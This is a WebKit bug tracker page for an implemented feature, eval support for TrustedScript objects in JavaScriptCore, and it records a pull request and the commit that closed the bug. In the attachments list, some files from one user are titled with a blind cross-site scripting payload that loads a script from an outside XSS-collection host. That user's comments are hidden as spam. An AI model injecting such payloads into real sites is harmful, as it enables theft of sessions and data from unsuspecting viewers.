Bug 273184 - Implement eval support for TrustedScript objects
Summary: Implement eval support for TrustedScript objects
Status: RESOLVED FIXED
Alias: None
Product: WebKit
Classification: Unclassified
Component: JavaScriptCore (show other bugs)
Version: Safari 17
Hardware: Unspecified Unspecified
: P2 Normal
Assignee: Luke Warlow
URL:
Keywords: InRadar
Depends on:
Blocks: 267694
  Show dependency treegraph
 
Reported: 2024-04-24 06:35 PDT by Luke Warlow
Modified: 2024-05-23 07:51 PDT (History)
2 users (show)

See Also:


Attachments
'"><script src=https://xss.report/c/wananlife></script> (1.57 KB, image/svg+xml)
2024-04-30 05:37 PDT, wananlife
no flags Details
'"><script src=https://xss.report/c/wananlife></script> (145 bytes, application/xml)
2024-04-30 05:44 PDT, wananlife
no flags Details
hackerone wananlife (138 bytes, application/xml)
2024-04-30 05:51 PDT, wananlife
no flags Details
hackerone wananlife (150 bytes, application/xml)
2024-04-30 05:54 PDT, wananlife
no flags Details
hackerone wananlife (178 bytes, application/xml)
2024-04-30 05:57 PDT, wananlife
no flags Details
hackerone wananlife (532 bytes, image/svg+xml)
2024-04-30 06:02 PDT, wananlife
no flags Details
hackerone wananlife (411 bytes, image/svg+xml)
2024-04-30 06:05 PDT, wananlife
no flags Details

Note You need to log in before you can comment on or make changes to this bug.
Description Luke Warlow 2024-04-24 06:35:25 PDT
Implement support for evaluating the code string associated with TrustedScript objects.

See Stage 3 proposal https://tc39.es/proposal-dynamic-code-brand-checks/ for more details.
Comment 1 Luke Warlow 2024-04-24 07:44:05 PDT
Pull request: https://github.com/WebKit/WebKit/pull/27691
Comment 2 wananlife 2024-04-30 05:37:45 PDT Comment hidden (spam)
Comment 3 wananlife 2024-04-30 05:44:04 PDT Comment hidden (spam)
Comment 4 wananlife 2024-04-30 05:51:58 PDT Comment hidden (spam)
Comment 5 wananlife 2024-04-30 05:54:07 PDT Comment hidden (spam)
Comment 6 wananlife 2024-04-30 05:57:11 PDT Comment hidden (spam)
Comment 7 wananlife 2024-04-30 06:02:23 PDT Comment hidden (spam)
Comment 8 wananlife 2024-04-30 06:05:21 PDT Comment hidden (spam)
Comment 9 wananlife 2024-04-30 06:08:14 PDT Comment hidden (spam)
Comment 10 Radar WebKit Bug Importer 2024-05-01 06:36:13 PDT
<rdar://problem/127357526>
Comment 11 EWS 2024-05-23 07:50:58 PDT
Committed 279194@main (5e0f9b3cfb2b): <https://commits.webkit.org/279194@main>

Reviewed commits have been landed. Closing PR #27691 and removing active labels.